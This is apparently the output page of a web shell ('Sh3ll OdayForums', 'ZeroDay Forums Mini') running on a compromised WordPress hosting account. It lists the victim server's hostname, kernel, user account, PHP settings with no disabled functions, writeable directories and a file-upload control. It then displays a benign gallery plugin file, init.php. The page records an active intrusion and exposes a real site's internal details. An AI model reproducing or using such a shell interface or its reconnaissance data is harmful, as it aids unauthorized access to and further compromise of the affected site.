Sh3ll
OdayForums


Server : LiteSpeed
System : Linux premium84.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : claqxcrl ( 523)
PHP Version : 8.1.32
Disable Function : NONE
Directory :  /home/claqxcrl/anfangola.com/wp-content/plugins/gallery-images-ape/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/claqxcrl/anfangola.com/wp-content/plugins/gallery-images-ape/modules/init.php
<?php 
/*  
 * Ape Gallery			
 * Author:            	Wp Gallery Ape 
 * Author URI:        	https://wpape.net/
 * License:           	GPL-2.0+
 */

apeGalleryHelper::load('core/class.php', WPAPE_GALLERY_MODULES_PATH);

class wpApeGallery_Module_Init extends wpApeGallery_Module{

	function getModuleFileName(){
		return __FILE__ ;
	}

	function load(){
		apeGalleryHelper::load('theme/init.php', WPAPE_GALLERY_MODULES_PATH);
		apeGalleryHelper::load('fields/init.php', WPAPE_GALLERY_MODULES_PATH);
		apeGalleryHelper::load('ajax/init.php', 	WPAPE_GALLERY_MODULES_PATH);
		//apeGalleryHelper::load('media/init.php', WPAPE_GALLERY_MODULES_PATH);
		apeGalleryHelper::load('frontend/init.php', 	WPAPE_GALLERY_MODULES_PATH);
		apeGalleryHelper::load('block/init.php', 	WPAPE_GALLERY_MODULES_PATH);
	}
}
$moduleInit = new wpApeGallery_Module_Init();

ZeroDay Forums Mini